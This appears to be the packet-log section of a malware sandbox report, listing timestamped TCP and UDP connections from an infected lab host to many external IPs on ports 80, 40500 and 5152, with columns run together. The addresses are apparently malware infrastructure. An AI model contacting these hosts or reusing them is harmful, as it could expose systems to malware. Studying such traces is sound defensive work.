                                                                                                                  Nov 30, 2024 01:58:10.590040922 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.590082884 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.709124088 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.709168911 CET8050077185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:10.709214926 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.709366083 CET5007780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:12.611953974 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:12.732129097 CET8050078185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:12.732237101 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:12.732995987 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:12.814450979 CET5007940500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:58:12.852966070 CET8050078185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:12.934803963 CET405005007991.185.130.166192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:12.937515974 CET5007940500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:58:12.938904047 CET5007940500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:58:12.953752995 CET5007940500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:58:13.058787107 CET405005007991.185.130.166192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:13.113976955 CET405005007991.185.130.166192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:14.120537996 CET8050078185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:14.120600939 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:14.233575106 CET4050050042188.124.116.191192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:14.233843088 CET5004240500192.168.2.4188.124.116.191
                                                                                                                  Nov 30, 2024 01:58:17.422117949 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:17.542411089 CET805008091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:17.542484999 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:17.543010950 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:17.662887096 CET805008091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:17.975991011 CET5008140500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:58:18.096431971 CET4050050081183.109.168.229192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:18.096523046 CET5008140500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:58:18.105202913 CET5008140500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:58:18.126698017 CET5008140500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:58:18.226033926 CET4050050081183.109.168.229192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:18.289968967 CET4050050081183.109.168.229192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:18.867265940 CET805008091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:18.867325068 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:19.481328011 CET4050050054187.230.142.108192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:19.481410027 CET5005440500192.168.2.4187.230.142.108
                                                                                                                  Nov 30, 2024 01:58:21.407371044 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:21.407895088 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:21.527873993 CET805008291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:21.527959108 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:21.528147936 CET805008091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:21.528192997 CET5008080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:21.529294014 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:21.649199009 CET805008291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:21.913233995 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:22.109978914 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:22.944890976 CET805008291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:22.945317030 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:23.142245054 CET5008340500192.168.2.4189.167.57.71
                                                                                                                  Nov 30, 2024 01:58:23.262432098 CET4050050083189.167.57.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:23.262535095 CET5008340500192.168.2.4189.167.57.71
                                                                                                                  Nov 30, 2024 01:58:23.263787031 CET5008340500192.168.2.4189.167.57.71
                                                                                                                  Nov 30, 2024 01:58:23.266129017 CET5008340500192.168.2.4189.167.57.71
                                                                                                                  Nov 30, 2024 01:58:23.383702040 CET4050050083189.167.57.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:23.429934978 CET4050050083189.167.57.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:24.606463909 CET40500500672.191.61.218192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:24.606532097 CET5006740500192.168.2.42.191.61.218
                                                                                                                  Nov 30, 2024 01:58:24.970854998 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:24.971139908 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:25.091201067 CET805008491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:25.091406107 CET805008291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:25.091527939 CET5008280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:25.091792107 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:25.091792107 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:25.211733103 CET805008491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:26.530436993 CET805008491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:26.530529976 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.282502890 CET5008540500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:28.402669907 CET4050050085176.113.143.77192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:28.402780056 CET5008540500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:28.404078960 CET5008540500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:28.406793118 CET5008540500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:28.524024010 CET4050050085176.113.143.77192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:28.553401947 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.553900003 CET5008680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.569962978 CET4050050085176.113.143.77192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:28.674004078 CET805008491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:28.674062967 CET5008480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.674942017 CET805008691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:28.675007105 CET5008680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.675144911 CET5008680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:28.794995070 CET805008691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:29.753556013 CET405005007694.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:29.753612041 CET5007640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:30.000835896 CET805008691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:30.003040075 CET5008680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:30.089622021 CET5008680192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:30.209556103 CET805008691.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:31.923438072 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:32.109910011 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:32.129798889 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:32.249790907 CET805008791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:32.253143072 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:32.253345013 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:32.373258114 CET805008791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:33.423079014 CET5008840500192.168.2.438.166.109.33
                                                                                                                  Nov 30, 2024 01:58:33.543180943 CET405005008838.166.109.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:33.543246984 CET5008840500192.168.2.438.166.109.33
                                                                                                                  Nov 30, 2024 01:58:33.546231985 CET5008840500192.168.2.438.166.109.33
                                                                                                                  Nov 30, 2024 01:58:33.584167004 CET805008791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:33.584223986 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:33.656820059 CET5008840500192.168.2.438.166.109.33
                                                                                                                  Nov 30, 2024 01:58:33.666145086 CET405005008838.166.109.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:33.817914963 CET405005008838.166.109.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:34.894259930 CET405005007991.185.130.166192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:34.894321918 CET5007940500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:58:36.784274101 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:36.784966946 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:36.904902935 CET8050078185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:36.904932976 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:36.904963970 CET5007880192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:36.905004025 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:36.905751944 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:37.025609016 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.345877886 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.345966101 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.345978022 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.346061945 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.346304893 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.346327066 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.346340895 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.346383095 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.346395969 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.346977949 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.346991062 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.347003937 CET8050089185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.347023964 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.347053051 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.351078033 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.351104975 CET5008980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.663239002 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:58:38.783260107 CET4050050090176.214.150.127192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.787086010 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:58:38.809449911 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:58:38.929419041 CET4050050090176.214.150.127192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:38.931056976 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:58:38.985637903 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:58:39.051088095 CET4050050090176.214.150.127192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:39.146047115 CET4050050090176.214.150.127192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:40.050415039 CET4050050081183.109.168.229192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:40.050476074 CET5008140500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:58:40.552712917 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:40.672806978 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:40.672890902 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:40.673165083 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:40.793049097 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:41.898704052 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.043467045 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080255032 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080331087 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080344915 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080354929 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080396891 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080396891 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080914021 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080928087 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080940962 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.080969095 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080985069 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.081789970 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.081809998 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.081824064 CET8050091185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:42.081859112 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.081871986 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.081964970 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.081993103 CET5009180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:43.985853910 CET5009240500192.168.2.4189.133.187.71
                                                                                                                  Nov 30, 2024 01:58:44.105988979 CET4050050092189.133.187.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:44.106065035 CET5009240500192.168.2.4189.133.187.71
                                                                                                                  Nov 30, 2024 01:58:44.107745886 CET5009240500192.168.2.4189.133.187.71
                                                                                                                  Nov 30, 2024 01:58:44.110049009 CET5009240500192.168.2.4189.133.187.71
                                                                                                                  Nov 30, 2024 01:58:44.114032984 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:44.227618933 CET4050050092189.133.187.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:44.233944893 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:44.234241009 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:44.235547066 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:44.273919106 CET4050050092189.133.187.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:44.355465889 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.232067108 CET4050050083189.167.57.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.232238054 CET5008340500192.168.2.4189.167.57.71
                                                                                                                  Nov 30, 2024 01:58:45.635937929 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636004925 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.636059999 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636070967 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636111975 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.636430025 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636442900 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636455059 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.636497974 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.637382984 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.637397051 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.637408972 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.637442112 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.637470961 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.638140917 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.638180017 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.638214111 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.638593912 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.756170988 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.756268978 CET8050093185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:45.756333113 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:45.757987022 CET5009380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:47.664606094 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:47.784748077 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:47.784843922 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:47.785048962 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:47.904927015 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.113646030 CET5009540500192.168.2.478.137.64.239
                                                                                                                  Nov 30, 2024 01:58:49.207572937 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.207609892 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.207695007 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.207699060 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.207756042 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208025932 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208036900 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208080053 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208393097 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208406925 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208446980 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208584070 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208599091 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208843946 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208897114 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.208981991 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.208993912 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.209029913 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.233706951 CET405005009578.137.64.239192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.233843088 CET5009540500192.168.2.478.137.64.239
                                                                                                                  Nov 30, 2024 01:58:49.261518002 CET5009540500192.168.2.478.137.64.239
                                                                                                                  Nov 30, 2024 01:58:49.266251087 CET5009540500192.168.2.478.137.64.239
                                                                                                                  Nov 30, 2024 01:58:49.327677965 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.327806950 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.327832937 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.327857018 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.331840992 CET8050094185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.331892967 CET5009480192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.381464005 CET405005009578.137.64.239192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:49.429946899 CET405005009578.137.64.239192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:50.435111046 CET4050050085176.113.143.77192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:50.435165882 CET5008540500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:51.239747047 CET5009680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:51.359949112 CET8050096185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:51.360038996 CET5009680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:51.360363960 CET5009680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:51.480252028 CET8050096185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:51.993823051 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:52.109970093 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:52.839843988 CET8050096185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:52.843122959 CET5009680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:54.299755096 CET5009740500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:54.419924974 CET405005009794.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:54.421133041 CET5009740500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:54.422365904 CET5009740500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:54.438173056 CET5009740500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:58:54.542344093 CET405005009794.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:54.602092028 CET405005009794.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:55.504122019 CET405005008838.166.109.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:55.504177094 CET5008840500192.168.2.438.166.109.33
                                                                                                                  Nov 30, 2024 01:58:55.878303051 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:55.878587961 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:55.998560905 CET805009891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:55.998644114 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:55.998717070 CET805008791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:55.998795986 CET5008780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:55.999177933 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:56.119040966 CET805009891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:57.377428055 CET805009891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:57.381150007 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.463630915 CET5009940500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:58:59.464936018 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.465136051 CET5010080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.583832026 CET4050050099134.35.104.95192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:59.584986925 CET805010091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:59.585084915 CET5009940500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:58:59.585170984 CET805009891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:59.585211992 CET5010080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.585232973 CET5009880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.586534023 CET5009940500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:58:59.586822987 CET5010080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:58:59.594516039 CET5009940500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:58:59.706418991 CET4050050099134.35.104.95192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:59.706657887 CET805010091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:58:59.758061886 CET4050050099134.35.104.95192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:00.694303989 CET4050050090176.214.150.127192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:00.695132017 CET5009040500192.168.2.4176.214.150.127
                                                                                                                  Nov 30, 2024 01:59:00.988385916 CET805010091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:00.988437891 CET5010080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:59:06.051080942 CET4050050092189.133.187.71192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:06.053087950 CET5009240500192.168.2.4189.133.187.71
                                                                                                                  Nov 30, 2024 01:59:06.905452013 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:07.110014915 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:59:11.191829920 CET405005009578.137.64.239192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:11.191946030 CET5009540500192.168.2.478.137.64.239
                                                                                                                  Nov 30, 2024 01:59:16.388586044 CET405005009794.141.226.56192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:16.388648033 CET5009740500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:59:16.898904085 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:17.125668049 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:59:21.551395893 CET4050050099134.35.104.95192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:21.551464081 CET5009940500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:59:22.841320038 CET8050096185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:22.841387033 CET5009680192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:59:29.202763081 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:29.422593117 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:59:30.987747908 CET805010091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:30.987792969 CET5010080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:59:38.891777039 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:59:38.938245058 CET498385152192.168.2.4185.215.113.66

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Nov 30, 2024 01:55:05.409560919 CET5618640500192.168.2.4182.188.65.58
                                                                                                                  Nov 30, 2024 01:55:10.423722029 CET5618640500192.168.2.438.224.37.24
